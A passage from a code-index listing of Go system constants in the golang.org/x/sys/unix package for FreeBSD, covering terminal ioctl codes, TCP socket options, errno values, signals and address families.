(line 1528) | S_IWRITE = 0x80 constant S_IWUSR (line 1529) | S_IWUSR = 0x80 constant S_IXGRP (line 1530) | S_IXGRP = 0x8 constant S_IXOTH (line 1531) | S_IXOTH = 0x1 constant S_IXUSR (line 1532) | S_IXUSR = 0x40 constant TAB0 (line 1533) | TAB0 = 0x0 constant TAB3 (line 1534) | TAB3 = 0x4 constant TABDLY (line 1535) | TABDLY = 0x4 constant TCIFLUSH (line 1536) | TCIFLUSH = 0x1 constant TCIOFF (line 1537) | TCIOFF = 0x3 constant TCIOFLUSH (line 1538) | TCIOFLUSH = 0x3 constant TCION (line 1539) | TCION = 0x4 constant TCOFLUSH (line 1540) | TCOFLUSH = 0x2 constant TCOOFF (line 1541) | TCOOFF = 0x1 constant TCOON (line 1542) | TCOON = 0x2 constant TCPOPT_EOL (line 1543) | TCPOPT_EOL = 0x0 constant TCPOPT_FAST_OPEN (line 1544) | TCPOPT_FAST_OPEN = 0x22 constant TCPOPT_MAXSEG (line 1545) | TCPOPT_MAXSEG = 0x2 constant TCPOPT_NOP (line 1546) | TCPOPT_NOP = 0x1 constant TCPOPT_PAD (line 1547) | TCPOPT_PAD = 0x0 constant TCPOPT_SACK (line 1548) | TCPOPT_SACK = 0x5 constant TCPOPT_SACK_PERMITTED (line 1549) | TCPOPT_SACK_PERMITTED = 0x4 constant TCPOPT_SIGNATURE (line 1550) | TCPOPT_SIGNATURE = 0x13 constant TCPOPT_TIMESTAMP (line 1551) | TCPOPT_TIMESTAMP = 0x8 constant TCPOPT_WINDOW (line 1552) | TCPOPT_WINDOW = 0x3 constant TCP_BBR_ACK_COMP_ALG (line 1553) | TCP_BBR_ACK_COMP_ALG = 0x448 constant TCP_BBR_ALGORITHM (line 1554) | TCP_BBR_ALGORITHM = 0x43b constant TCP_BBR_DRAIN_INC_EXTRA (line 1555) | TCP_BBR_DRAIN_INC_EXTRA = 0x43c constant TCP_BBR_DRAIN_PG (line 1556) | TCP_BBR_DRAIN_PG = 0x42e constant TCP_BBR_EXTRA_GAIN (line 1557) | TCP_BBR_EXTRA_GAIN = 0x449 constant TCP_BBR_EXTRA_STATE (line 1558) | TCP_BBR_EXTRA_STATE = 0x453 constant TCP_BBR_FLOOR_MIN_TSO (line 1559) | TCP_BBR_FLOOR_MIN_TSO = 0x454 constant TCP_BBR_HDWR_PACE (line 1560) | TCP_BBR_HDWR_PACE = 0x451 constant TCP_BBR_HOLD_TARGET (line 1561) | TCP_BBR_HOLD_TARGET = 0x436 constant TCP_BBR_IWINTSO (line 1562) | TCP_BBR_IWINTSO = 0x42b constant TCP_BBR_LOWGAIN_FD (line 1563) | TCP_BBR_LOWGAIN_FD = 0x436 constant TCP_BBR_LOWGAIN_HALF (line 1564) | TCP_BBR_LOWGAIN_HALF = 0x435 constant TCP_BBR_LOWGAIN_THRESH (line 1565) | TCP_BBR_LOWGAIN_THRESH = 0x434 constant TCP_BBR_MAX_RTO (line 1566) | TCP_BBR_MAX_RTO = 0x439 constant TCP_BBR_MIN_RTO (line 1567) | TCP_BBR_MIN_RTO = 0x438 constant TCP_BBR_MIN_TOPACEOUT (line 1568) | TCP_BBR_MIN_TOPACEOUT = 0x455 constant TCP_BBR_ONE_RETRAN (line 1569) | TCP_BBR_ONE_RETRAN = 0x431 constant TCP_BBR_PACE_CROSS (line 1570) | TCP_BBR_PACE_CROSS = 0x442 constant TCP_BBR_PACE_DEL_TAR (line 1571) | TCP_BBR_PACE_DEL_TAR = 0x43f constant TCP_BBR_PACE_OH (line 1572) | TCP_BBR_PACE_OH = 0x435 constant TCP_BBR_PACE_PER_SEC (line 1573) | TCP_BBR_PACE_PER_SEC = 0x43e constant TCP_BBR_PACE_SEG_MAX (line 1574) | TCP_BBR_PACE_SEG_MAX = 0x440 constant TCP_BBR_PACE_SEG_MIN (line 1575) | TCP_BBR_PACE_SEG_MIN = 0x441 constant TCP_BBR_POLICER_DETECT (line 1576) | TCP_BBR_POLICER_DETECT = 0x457 constant TCP_BBR_PROBE_RTT_GAIN (line 1577) | TCP_BBR_PROBE_RTT_GAIN = 0x44d constant TCP_BBR_PROBE_RTT_INT (line 1578) | TCP_BBR_PROBE_RTT_INT = 0x430 constant TCP_BBR_PROBE_RTT_LEN (line 1579) | TCP_BBR_PROBE_RTT_LEN = 0x44e constant TCP_BBR_RACK_RTT_USE (line 1580) | TCP_BBR_RACK_RTT_USE = 0x44a constant TCP_BBR_RECFORCE (line 1581) | TCP_BBR_RECFORCE = 0x42c constant TCP_BBR_REC_OVER_HPTS (line 1582) | TCP_BBR_REC_OVER_HPTS = 0x43a constant TCP_BBR_RETRAN_WTSO (line 1583) | TCP_BBR_RETRAN_WTSO = 0x44b constant TCP_BBR_RWND_IS_APP (line 1584) | TCP_BBR_RWND_IS_APP = 0x42f constant TCP_BBR_SEND_IWND_IN_TSO (line 1585) | TCP_BBR_SEND_IWND_IN_TSO = 0x44f constant TCP_BBR_STARTUP_EXIT_EPOCH (line 1586) | TCP_BBR_STARTUP_EXIT_EPOCH = 0x43d constant TCP_BBR_STARTUP_LOSS_EXIT (line 1587) | TCP_BBR_STARTUP_LOSS_EXIT = 0x432 constant TCP_BBR_STARTUP_PG (line 1588) | TCP_BBR_STARTUP_PG = 0x42d constant TCP_BBR_TMR_PACE_OH (line 1589) | TCP_BBR_TMR_PACE_OH = 0x448 constant TCP_BBR_TSLIMITS (line 1590) | TCP_BBR_TSLIMITS = 0x434 constant TCP_BBR_TSTMP_RAISES (line 1591) | TCP_BBR_TSTMP_RAISES = 0x456 constant TCP_BBR_UNLIMITED (line 1592) | TCP_BBR_UNLIMITED = 0x43b constant TCP_BBR_USEDEL_RATE (line 1593) | TCP_BBR_USEDEL_RATE = 0x437 constant TCP_BBR_USE_LOWGAIN (line 1594) | TCP_BBR_USE_LOWGAIN = 0x433 constant TCP_BBR_USE_RACK_CHEAT (line 1595) | TCP_BBR_USE_RACK_CHEAT = 0x450 constant TCP_BBR_UTTER_MAX_TSO (line 1596) | TCP_BBR_UTTER_MAX_TSO = 0x452 constant TCP_CA_NAME_MAX (line 1597) | TCP_CA_NAME_MAX = 0x10 constant TCP_CCALGOOPT (line 1598) | TCP_CCALGOOPT = 0x41 constant TCP_CONGESTION (line 1599) | TCP_CONGESTION = 0x40 constant TCP_DATA_AFTER_CLOSE (line 1600) | TCP_DATA_AFTER_CLOSE = 0x44c constant TCP_DELACK (line 1601) | TCP_DELACK = 0x48 constant TCP_FASTOPEN (line 1602) | TCP_FASTOPEN = 0x401 constant TCP_FASTOPEN_MAX_COOKIE_LEN (line 1603) | TCP_FASTOPEN_MAX_COOKIE_LEN = 0x10 constant TCP_FASTOPEN_MIN_COOKIE_LEN (line 1604) | TCP_FASTOPEN_MIN_COOKIE_LEN = 0x4 constant TCP_FASTOPEN_PSK_LEN (line 1605) | TCP_FASTOPEN_PSK_LEN = 0x10 constant TCP_FUNCTION_BLK (line 1606) | TCP_FUNCTION_BLK = 0x2000 constant TCP_FUNCTION_NAME_LEN_MAX (line 1607) | TCP_FUNCTION_NAME_LEN_MAX = 0x20 constant TCP_INFO (line 1608) | TCP_INFO = 0x20 constant TCP_KEEPCNT (line 1609) | TCP_KEEPCNT = 0x400 constant TCP_KEEPIDLE (line 1610) | TCP_KEEPIDLE = 0x100 constant TCP_KEEPINIT (line 1611) | TCP_KEEPINIT = 0x80 constant TCP_KEEPINTVL (line 1612) | TCP_KEEPINTVL = 0x200 constant TCP_LOG (line 1613) | TCP_LOG = 0x22 constant TCP_LOGBUF (line 1614) | TCP_LOGBUF = 0x23 constant TCP_LOGDUMP (line 1615) | TCP_LOGDUMP = 0x25 constant TCP_LOGDUMPID (line 1616) | TCP_LOGDUMPID = 0x26 constant TCP_LOGID (line 1617) | TCP_LOGID = 0x24 constant TCP_LOG_ID_LEN (line 1618) | TCP_LOG_ID_LEN = 0x40 constant TCP_MAXBURST (line 1619) | TCP_MAXBURST = 0x4 constant TCP_MAXHLEN (line 1620) | TCP_MAXHLEN = 0x3c constant TCP_MAXOLEN (line 1621) | TCP_MAXOLEN = 0x28 constant TCP_MAXSEG (line 1622) | TCP_MAXSEG = 0x2 constant TCP_MAXWIN (line 1623) | TCP_MAXWIN = 0xffff constant TCP_MAX_SACK (line 1624) | TCP_MAX_SACK = 0x4 constant TCP_MAX_WINSHIFT (line 1625) | TCP_MAX_WINSHIFT = 0xe constant TCP_MD5SIG (line 1626) | TCP_MD5SIG = 0x10 constant TCP_MINMSS (line 1627) | TCP_MINMSS = 0xd8 constant TCP_MSS (line 1628) | TCP_MSS = 0x218 constant TCP_NODELAY (line 1629) | TCP_NODELAY = 0x1 constant TCP_NOOPT (line 1630) | TCP_NOOPT = 0x8 constant TCP_NOPUSH (line 1631) | TCP_NOPUSH = 0x4 constant TCP_PCAP_IN (line 1632) | TCP_PCAP_IN = 0x1000 constant TCP_PCAP_OUT (line 1633) | TCP_PCAP_OUT = 0x800 constant TCP_RACK_EARLY_RECOV (line 1634) | TCP_RACK_EARLY_RECOV = 0x423 constant TCP_RACK_EARLY_SEG (line 1635) | TCP_RACK_EARLY_SEG = 0x424 constant TCP_RACK_GP_INCREASE (line 1636) | TCP_RACK_GP_INCREASE = 0x446 constant TCP_RACK_IDLE_REDUCE_HIGH (line 1637) | TCP_RACK_IDLE_REDUCE_HIGH = 0x444 constant TCP_RACK_MIN_PACE (line 1638) | TCP_RACK_MIN_PACE = 0x445 constant TCP_RACK_MIN_PACE_SEG (line 1639) | TCP_RACK_MIN_PACE_SEG = 0x446 constant TCP_RACK_MIN_TO (line 1640) | TCP_RACK_MIN_TO = 0x422 constant TCP_RACK_PACE_ALWAYS (line 1641) | TCP_RACK_PACE_ALWAYS = 0x41f constant TCP_RACK_PACE_MAX_SEG (line 1642) | TCP_RACK_PACE_MAX_SEG = 0x41e constant TCP_RACK_PACE_REDUCE (line 1643) | TCP_RACK_PACE_REDUCE = 0x41d constant TCP_RACK_PKT_DELAY (line 1644) | TCP_RACK_PKT_DELAY = 0x428 constant TCP_RACK_PROP (line 1645) | TCP_RACK_PROP = 0x41b constant TCP_RACK_PROP_RATE (line 1646) | TCP_RACK_PROP_RATE = 0x420 constant TCP_RACK_PRR_SENDALOT (line 1647) | TCP_RACK_PRR_SENDALOT = 0x421 constant TCP_RACK_REORD_FADE (line 1648) | TCP_RACK_REORD_FADE = 0x426 constant TCP_RACK_REORD_THRESH (line 1649) | TCP_RACK_REORD_THRESH = 0x425 constant TCP_RACK_TLP_INC_VAR (line 1650) | TCP_RACK_TLP_INC_VAR = 0x429 constant TCP_RACK_TLP_REDUCE (line 1651) | TCP_RACK_TLP_REDUCE = 0x41c constant TCP_RACK_TLP_THRESH (line 1652) | TCP_RACK_TLP_THRESH = 0x427 constant TCP_RACK_TLP_USE (line 1653) | TCP_RACK_TLP_USE = 0x447 constant TCP_VENDOR (line 1654) | TCP_VENDOR = 0x80000000 constant TCSAFLUSH (line 1655) | TCSAFLUSH = 0x2 constant TIMER_ABSTIME (line 1656) | TIMER_ABSTIME = 0x1 constant TIMER_RELTIME (line 1657) | TIMER_RELTIME = 0x0 constant TIOCCBRK (line 1658) | TIOCCBRK = 0x2000747a constant TIOCCDTR (line 1659) | TIOCCDTR = 0x20007478 constant TIOCCONS (line 1660) | TIOCCONS = 0x80047462 constant TIOCDRAIN (line 1661) | TIOCDRAIN = 0x2000745e constant TIOCEXCL (line 1662) | TIOCEXCL = 0x2000740d constant TIOCEXT (line 1663) | TIOCEXT = 0x80047460 constant TIOCFLUSH (line 1664) | TIOCFLUSH = 0x80047410 constant TIOCGDRAINWAIT (line 1665) | TIOCGDRAINWAIT = 0x40047456 constant TIOCGETA (line 1666) | TIOCGETA = 0x402c7413 constant TIOCGETD (line 1667) | TIOCGETD = 0x4004741a constant TIOCGPGRP (line 1668) | TIOCGPGRP = 0x40047477 constant TIOCGPTN (line 1669) | TIOCGPTN = 0x4004740f constant TIOCGSID (line 1670) | TIOCGSID = 0x40047463 constant TIOCGWINSZ (line 1671) | TIOCGWINSZ = 0x40087468 constant TIOCMBIC (line 1672) | TIOCMBIC = 0x8004746b constant TIOCMBIS (line 1673) | TIOCMBIS = 0x8004746c constant TIOCMGDTRWAIT (line 1674) | TIOCMGDTRWAIT = 0x4004745a constant TIOCMGET (line 1675) | TIOCMGET = 0x4004746a constant TIOCMSDTRWAIT (line 1676) | TIOCMSDTRWAIT = 0x8004745b constant TIOCMSET (line 1677) | TIOCMSET = 0x8004746d constant TIOCM_CAR (line 1678) | TIOCM_CAR = 0x40 constant TIOCM_CD (line 1679) | TIOCM_CD = 0x40 constant TIOCM_CTS (line 1680) | TIOCM_CTS = 0x20 constant TIOCM_DCD (line 1681) | TIOCM_DCD = 0x40 constant TIOCM_DSR (line 1682) | TIOCM_DSR = 0x100 constant TIOCM_DTR (line 1683) | TIOCM_DTR = 0x2 constant TIOCM_LE (line 1684) | TIOCM_LE = 0x1 constant TIOCM_RI (line 1685) | TIOCM_RI = 0x80 constant TIOCM_RNG (line 1686) | TIOCM_RNG = 0x80 constant TIOCM_RTS (line 1687) | TIOCM_RTS = 0x4 constant TIOCM_SR (line 1688) | TIOCM_SR = 0x10 constant TIOCM_ST (line 1689) | TIOCM_ST = 0x8 constant TIOCNOTTY (line 1690) | TIOCNOTTY = 0x20007471 constant TIOCNXCL (line 1691) | TIOCNXCL = 0x2000740e constant TIOCOUTQ (line 1692) | TIOCOUTQ = 0x40047473 constant TIOCPKT (line 1693) | TIOCPKT = 0x80047470 constant TIOCPKT_DATA (line 1694) | TIOCPKT_DATA = 0x0 constant TIOCPKT_DOSTOP (line 1695) | TIOCPKT_DOSTOP = 0x20 constant TIOCPKT_FLUSHREAD (line 1696) | TIOCPKT_FLUSHREAD = 0x1 constant TIOCPKT_FLUSHWRITE (line 1697) | TIOCPKT_FLUSHWRITE = 0x2 constant TIOCPKT_IOCTL (line 1698) | TIOCPKT_IOCTL = 0x40 constant TIOCPKT_NOSTOP (line 1699) | TIOCPKT_NOSTOP = 0x10 constant TIOCPKT_START (line 1700) | TIOCPKT_START = 0x8 constant TIOCPKT_STOP (line 1701) | TIOCPKT_STOP = 0x4 constant TIOCPTMASTER (line 1702) | TIOCPTMASTER = 0x2000741c constant TIOCSBRK (line 1703) | TIOCSBRK = 0x2000747b constant TIOCSCTTY (line 1704) | TIOCSCTTY = 0x20007461 constant TIOCSDRAINWAIT (line 1705) | TIOCSDRAINWAIT = 0x80047457 constant TIOCSDTR (line 1706) | TIOCSDTR = 0x20007479 constant TIOCSETA (line 1707) | TIOCSETA = 0x802c7414 constant TIOCSETAF (line 1708) | TIOCSETAF = 0x802c7416 constant TIOCSETAW (line 1709) | TIOCSETAW = 0x802c7415 constant TIOCSETD (line 1710) | TIOCSETD = 0x8004741b constant TIOCSIG (line 1711) | TIOCSIG = 0x2004745f constant TIOCSPGRP (line 1712) | TIOCSPGRP = 0x80047476 constant TIOCSTART (line 1713) | TIOCSTART = 0x2000746e constant TIOCSTAT (line 1714) | TIOCSTAT = 0x20007465 constant TIOCSTI (line 1715) | TIOCSTI = 0x80017472 constant TIOCSTOP (line 1716) | TIOCSTOP = 0x2000746f constant TIOCSWINSZ (line 1717) | TIOCSWINSZ = 0x80087467 constant TIOCTIMESTAMP (line 1718) | TIOCTIMESTAMP = 0x40087459 constant TIOCUCNTL (line 1719) | TIOCUCNTL = 0x80047466 constant TOSTOP (line 1720) | TOSTOP = 0x400000 constant UTIME_NOW (line 1721) | UTIME_NOW = -0x1 constant UTIME_OMIT (line 1722) | UTIME_OMIT = -0x2 constant VDISCARD (line 1723) | VDISCARD = 0xf constant VDSUSP (line 1724) | VDSUSP = 0xb constant VEOF (line 1725) | VEOF = 0x0 constant VEOL (line 1726) | VEOL = 0x1 constant VEOL2 (line 1727) | VEOL2 = 0x2 constant VERASE (line 1728) | VERASE = 0x3 constant VERASE2 (line 1729) | VERASE2 = 0x7 constant VINTR (line 1730) | VINTR = 0x8 constant VKILL (line 1731) | VKILL = 0x5 constant VLNEXT (line 1732) | VLNEXT = 0xe constant VMIN (line 1733) | VMIN = 0x10 constant VM_BCACHE_SIZE_MAX (line 1734) | VM_BCACHE_SIZE_MAX = 0x70e0000 constant VM_SWZONE_SIZE_MAX (line 1735) | VM_SWZONE_SIZE_MAX = 0x2280000 constant VQUIT (line 1736) | VQUIT = 0x9 constant VREPRINT (line 1737) | VREPRINT = 0x6 constant VSTART (line 1738) | VSTART = 0xc constant VSTATUS (line 1739) | VSTATUS = 0x12 constant VSTOP (line 1740) | VSTOP = 0xd constant VSUSP (line 1741) | VSUSP = 0xa constant VTIME (line 1742) | VTIME = 0x11 constant VWERASE (line 1743) | VWERASE = 0x4 constant WCONTINUED (line 1744) | WCONTINUED = 0x4 constant WCOREFLAG (line 1745) | WCOREFLAG = 0x80 constant WEXITED (line 1746) | WEXITED = 0x10 constant WLINUXCLONE (line 1747) | WLINUXCLONE = 0x80000000 constant WNOHANG (line 1748) | WNOHANG = 0x1 constant WNOWAIT (line 1749) | WNOWAIT = 0x8 constant WSTOPPED (line 1750) | WSTOPPED = 0x2 constant WTRAPPED (line 1751) | WTRAPPED = 0x20 constant WUNTRACED (line 1752) | WUNTRACED = 0x2 constant E2BIG (line 1757) | E2BIG = syscall.Errno(0x7) constant EACCES (line 1758) | EACCES = syscall.Errno(0xd) constant EADDRINUSE (line 1759) | EADDRINUSE = syscall.Errno(0x30) constant EADDRNOTAVAIL (line 1760) | EADDRNOTAVAIL = syscall.Errno(0x31) constant EAFNOSUPPORT (line 1761) | EAFNOSUPPORT = syscall.Errno(0x2f) constant EAGAIN (line 1762) | EAGAIN = syscall.Errno(0x23) constant EALREADY (line 1763) | EALREADY = syscall.Errno(0x25) constant EAUTH (line 1764) | EAUTH = syscall.Errno(0x50) constant EBADF (line 1765) | EBADF = syscall.Errno(0x9) constant EBADMSG (line 1766) | EBADMSG = syscall.Errno(0x59) constant EBADRPC (line 1767) | EBADRPC = syscall.Errno(0x48) constant EBUSY (line 1768) | EBUSY = syscall.Errno(0x10) constant ECANCELED (line 1769) | ECANCELED = syscall.Errno(0x55) constant ECAPMODE (line 1770) | ECAPMODE = syscall.Errno(0x5e) constant ECHILD (line 1771) | ECHILD = syscall.Errno(0xa) constant ECONNABORTED (line 1772) | ECONNABORTED = syscall.Errno(0x35) constant ECONNREFUSED (line 1773) | ECONNREFUSED = syscall.Errno(0x3d) constant ECONNRESET (line 1774) | ECONNRESET = syscall.Errno(0x36) constant EDEADLK (line 1775) | EDEADLK = syscall.Errno(0xb) constant EDESTADDRREQ (line 1776) | EDESTADDRREQ = syscall.Errno(0x27) constant EDOM (line 1777) | EDOM = syscall.Errno(0x21) constant EDOOFUS (line 1778) | EDOOFUS = syscall.Errno(0x58) constant EDQUOT (line 1779) | EDQUOT = syscall.Errno(0x45) constant EEXIST (line 1780) | EEXIST = syscall.Errno(0x11) constant EFAULT (line 1781) | EFAULT = syscall.Errno(0xe) constant EFBIG (line 1782) | EFBIG = syscall.Errno(0x1b) constant EFTYPE (line 1783) | EFTYPE = syscall.Errno(0x4f) constant EHOSTDOWN (line 1784) | EHOSTDOWN = syscall.Errno(0x40) constant EHOSTUNREACH (line 1785) | EHOSTUNREACH = syscall.Errno(0x41) constant EIDRM (line 1786) | EIDRM = syscall.Errno(0x52) constant EILSEQ (line 1787) | EILSEQ = syscall.Errno(0x56) constant EINPROGRESS (line 1788) | EINPROGRESS = syscall.Errno(0x24) constant EINTEGRITY (line 1789) | EINTEGRITY = syscall.Errno(0x61) constant EINTR (line 1790) | EINTR = syscall.Errno(0x4) constant EINVAL (line 1791) | EINVAL = syscall.Errno(0x16) constant EIO (line 1792) | EIO = syscall.Errno(0x5) constant EISCONN (line 1793) | EISCONN = syscall.Errno(0x38) constant EISDIR (line 1794) | EISDIR = syscall.Errno(0x15) constant ELAST (line 1795) | ELAST = syscall.Errno(0x61) constant ELOOP (line 1796) | ELOOP = syscall.Errno(0x3e) constant EMFILE (line 1797) | EMFILE = syscall.Errno(0x18) constant EMLINK (line 1798) | EMLINK = syscall.Errno(0x1f) constant EMSGSIZE (line 1799) | EMSGSIZE = syscall.Errno(0x28) constant EMULTIHOP (line 1800) | EMULTIHOP = syscall.Errno(0x5a) constant ENAMETOOLONG (line 1801) | ENAMETOOLONG = syscall.Errno(0x3f) constant ENEEDAUTH (line 1802) | ENEEDAUTH = syscall.Errno(0x51) constant ENETDOWN (line 1803) | ENETDOWN = syscall.Errno(0x32) constant ENETRESET (line 1804) | ENETRESET = syscall.Errno(0x34) constant ENETUNREACH (line 1805) | ENETUNREACH = syscall.Errno(0x33) constant ENFILE (line 1806) | ENFILE = syscall.Errno(0x17) constant ENOATTR (line 1807) | ENOATTR = syscall.Errno(0x57) constant ENOBUFS (line 1808) | ENOBUFS = syscall.Errno(0x37) constant ENODEV (line 1809) | ENODEV = syscall.Errno(0x13) constant ENOENT (line 1810) | ENOENT = syscall.Errno(0x2) constant ENOEXEC (line 1811) | ENOEXEC = syscall.Errno(0x8) constant ENOLCK (line 1812) | ENOLCK = syscall.Errno(0x4d) constant ENOLINK (line 1813) | ENOLINK = syscall.Errno(0x5b) constant ENOMEM (line 1814) | ENOMEM = syscall.Errno(0xc) constant ENOMSG (line 1815) | ENOMSG = syscall.Errno(0x53) constant ENOPROTOOPT (line 1816) | ENOPROTOOPT = syscall.Errno(0x2a) constant ENOSPC (line 1817) | ENOSPC = syscall.Errno(0x1c) constant ENOSYS (line 1818) | ENOSYS = syscall.Errno(0x4e) constant ENOTBLK (line 1819) | ENOTBLK = syscall.Errno(0xf) constant ENOTCAPABLE (line 1820) | ENOTCAPABLE = syscall.Errno(0x5d) constant ENOTCONN (line 1821) | ENOTCONN = syscall.Errno(0x39) constant ENOTDIR (line 1822) | ENOTDIR = syscall.Errno(0x14) constant ENOTEMPTY (line 1823) | ENOTEMPTY = syscall.Errno(0x42) constant ENOTRECOVERABLE (line 1824) | ENOTRECOVERABLE = syscall.Errno(0x5f) constant ENOTSOCK (line 1825) | ENOTSOCK = syscall.Errno(0x26) constant ENOTSUP (line 1826) | ENOTSUP = syscall.Errno(0x2d) constant ENOTTY (line 1827) | ENOTTY = syscall.Errno(0x19) constant ENXIO (line 1828) | ENXIO = syscall.Errno(0x6) constant EOPNOTSUPP (line 1829) | EOPNOTSUPP = syscall.Errno(0x2d) constant EOVERFLOW (line 1830) | EOVERFLOW = syscall.Errno(0x54) constant EOWNERDEAD (line 1831) | EOWNERDEAD = syscall.Errno(0x60) constant EPERM (line 1832) | EPERM = syscall.Errno(0x1) constant EPFNOSUPPORT (line 1833) | EPFNOSUPPORT = syscall.Errno(0x2e) constant EPIPE (line 1834) | EPIPE = syscall.Errno(0x20) constant EPROCLIM (line 1835) | EPROCLIM = syscall.Errno(0x43) constant EPROCUNAVAIL (line 1836) | EPROCUNAVAIL = syscall.Errno(0x4c) constant EPROGMISMATCH (line 1837) | EPROGMISMATCH = syscall.Errno(0x4b) constant EPROGUNAVAIL (line 1838) | EPROGUNAVAIL = syscall.Errno(0x4a) constant EPROTO (line 1839) | EPROTO = syscall.Errno(0x5c) constant EPROTONOSUPPORT (line 1840) | EPROTONOSUPPORT = syscall.Errno(0x2b) constant EPROTOTYPE (line 1841) | EPROTOTYPE = syscall.Errno(0x29) constant ERANGE (line 1842) | ERANGE = syscall.Errno(0x22) constant EREMOTE (line 1843) | EREMOTE = syscall.Errno(0x47) constant EROFS (line 1844) | EROFS = syscall.Errno(0x1e) constant ERPCMISMATCH (line 1845) | ERPCMISMATCH = syscall.Errno(0x49) constant ESHUTDOWN (line 1846) | ESHUTDOWN = syscall.Errno(0x3a) constant ESOCKTNOSUPPORT (line 1847) | ESOCKTNOSUPPORT = syscall.Errno(0x2c) constant ESPIPE (line 1848) | ESPIPE = syscall.Errno(0x1d) constant ESRCH (line 1849) | ESRCH = syscall.Errno(0x3) constant ESTALE (line 1850) | ESTALE = syscall.Errno(0x46) constant ETIMEDOUT (line 1851) | ETIMEDOUT = syscall.Errno(0x3c) constant ETOOMANYREFS (line 1852) | ETOOMANYREFS = syscall.Errno(0x3b) constant ETXTBSY (line 1853) | ETXTBSY = syscall.Errno(0x1a) constant EUSERS (line 1854) | EUSERS = syscall.Errno(0x44) constant EWOULDBLOCK (line 1855) | EWOULDBLOCK = syscall.Errno(0x23) constant EXDEV (line 1856) | EXDEV = syscall.Errno(0x12) constant SIGABRT (line 1861) | SIGABRT = syscall.Signal(0x6) constant SIGALRM (line 1862) | SIGALRM = syscall.Signal(0xe) constant SIGBUS (line 1863) | SIGBUS = syscall.Signal(0xa) constant SIGCHLD (line 1864) | SIGCHLD = syscall.Signal(0x14) constant SIGCONT (line 1865) | SIGCONT = syscall.Signal(0x13) constant SIGEMT (line 1866) | SIGEMT = syscall.Signal(0x7) constant SIGFPE (line 1867) | SIGFPE = syscall.Signal(0x8) constant SIGHUP (line 1868) | SIGHUP = syscall.Signal(0x1) constant SIGILL (line 1869) | SIGILL = syscall.Signal(0x4) constant SIGINFO (line 1870) | SIGINFO = syscall.Signal(0x1d) constant SIGINT (line 1871) | SIGINT = syscall.Signal(0x2) constant SIGIO (line 1872) | SIGIO = syscall.Signal(0x17) constant SIGIOT (line 1873) | SIGIOT = syscall.Signal(0x6) constant SIGKILL (line 1874) | SIGKILL = syscall.Signal(0x9) constant SIGLIBRT (line 1875) | SIGLIBRT = syscall.Signal(0x21) constant SIGLWP (line 1876) | SIGLWP = syscall.Signal(0x20) constant SIGPIPE (line 1877) | SIGPIPE = syscall.Signal(0xd) constant SIGPROF (line 1878) | SIGPROF = syscall.Signal(0x1b) constant SIGQUIT (line 1879) | SIGQUIT = syscall.Signal(0x3) constant SIGSEGV (line 1880) | SIGSEGV = syscall.Signal(0xb) constant SIGSTOP (line 1881) | SIGSTOP = syscall.Signal(0x11) constant SIGSYS (line 1882) | SIGSYS = syscall.Signal(0xc) constant SIGTERM (line 1883) | SIGTERM = syscall.Signal(0xf) constant SIGTHR (line 1884) | SIGTHR = syscall.Signal(0x20) constant SIGTRAP (line 1885) | SIGTRAP = syscall.Signal(0x5) constant SIGTSTP (line 1886) | SIGTSTP = syscall.Signal(0x12) constant SIGTTIN (line 1887) | SIGTTIN = syscall.Signal(0x15) constant SIGTTOU (line 1888) | SIGTTOU = syscall.Signal(0x16) constant SIGURG (line 1889) | SIGURG = syscall.Signal(0x10) constant SIGUSR1 (line 1890) | SIGUSR1 = syscall.Signal(0x1e) constant SIGUSR2 (line 1891) | SIGUSR2 = syscall.Signal(0x1f) constant SIGVTALRM (line 1892) | SIGVTALRM = syscall.Signal(0x1a) constant SIGWINCH (line 1893) | SIGWINCH = syscall.Signal(0x1c) constant SIGXCPU (line 1894) | SIGXCPU = syscall.Signal(0x18) constant SIGXFSZ (line 1895) | SIGXFSZ = syscall.Signal(0x19) FILE: vendor/golang.org/x/sys/unix/zerrors_freebsd_amd64.go constant AF_APPLETALK (line 14) | AF_APPLETALK = 0x10 constant AF_ARP (line 15) | AF_ARP = 0x23 constant AF_ATM (line 16) | AF_ATM = 0x1e constant AF_BLUETOOTH (line 17) | AF_BLUETOOTH = 0x24 constant AF_CCITT (line 18) | AF_CCITT = 0xa constant AF_CHAOS (line 19) | AF_CHAOS = 0x5 constant AF_CNT (line 20) | AF_CNT = 0x15 constant AF_COIP (line 21) | AF_COIP = 0x14 constant AF_DATAKIT (line 22) | AF_DATAKIT = 0x9 constant AF_DECnet (line 23) | AF_DECnet = 0xc constant AF_DLI (line 24) | AF_DLI = 0xd constant AF_E164 (line 25) | AF_E164 = 0x1a constant AF_ECMA (line 26) | AF_ECMA = 0x8 constant AF_HYLINK (line 27) | AF_HYLINK = 0xf constant AF_IEEE80211 (line 28) | AF_IEEE80211 = 0x25 constant AF_IMPLINK (line 29) | AF_IMPLINK = 0x3 constant AF_INET (line 30) | AF_INET = 0x2 constant AF_INET6 (line 31) | AF_INET6 = 0x1c constant AF_INET6_SDP (line 32) | AF_INET6_SDP = 0x2a constant AF_INET_SDP (line 33) | AF_INET_SDP = 0x28 constant AF_IPX (line 34) | AF_IPX = 0x17 constant AF_ISDN (line 35) | AF_ISDN = 0x1a constant AF_ISO (line 36) | AF_ISO = 0x7 constant AF_LAT (line 37) | AF_LAT = 0xe constant AF_LINK (line 38) | AF_LINK = 0x12 constant AF_LOCAL (line 39) | AF_LOCAL = 0x1 constant AF_MAX (line 40) | AF_MAX = 0x2a constant AF_NATM (line 41) | AF_NATM = 0x1d constant AF_NETBIOS (line 42) | AF_NETBIOS = 0x6 constant AF_NETGRAPH (line 43) | AF_NETGRAPH = 0x20 constant AF_OSI (line 44) | AF_OSI = 0x7 constant AF_PUP (line 45) | AF_PUP = 0x4 constant AF_ROUTE (line 46) | AF_ROUTE = 0x11 constant AF_SCLUSTER (line 47) | AF_SCLUSTER = 0x22 constant AF_SIP (line 48) | AF_SIP = 0x18 constant AF_SLOW (line 49) | AF_SLOW = 0x21 constant AF_SNA (line 50) | AF_SNA = 0xb constant AF_UNIX (line 51) | AF_UNIX = 0x1 constant AF_UNSPEC (line 52) | AF_UNSPEC = 0x0 constant AF_VENDOR00 (line 53) | AF_VENDOR00 = 0x27 constant AF_VENDOR01 (line 54) | AF_VENDOR01 = 0x29 constant AF_VENDOR02 (line 55) | AF_VENDOR02 = 0x2b constant AF_VENDOR03 (line 56) | AF_VENDOR03 = 0x2d constant AF_VENDOR04 (line 57) | AF_VENDOR04 = 0x2f constant AF_VENDOR05 (line 58) | AF_VENDOR05 = 0x31 constant AF_VENDOR06 (line 59) | AF_VENDOR06 = 0x33 constant AF_VENDOR07 (line 60) | AF_VENDOR07 = 0x35 constant AF_VENDOR08 (line 61) | AF_VENDOR08 = 0x37 constant 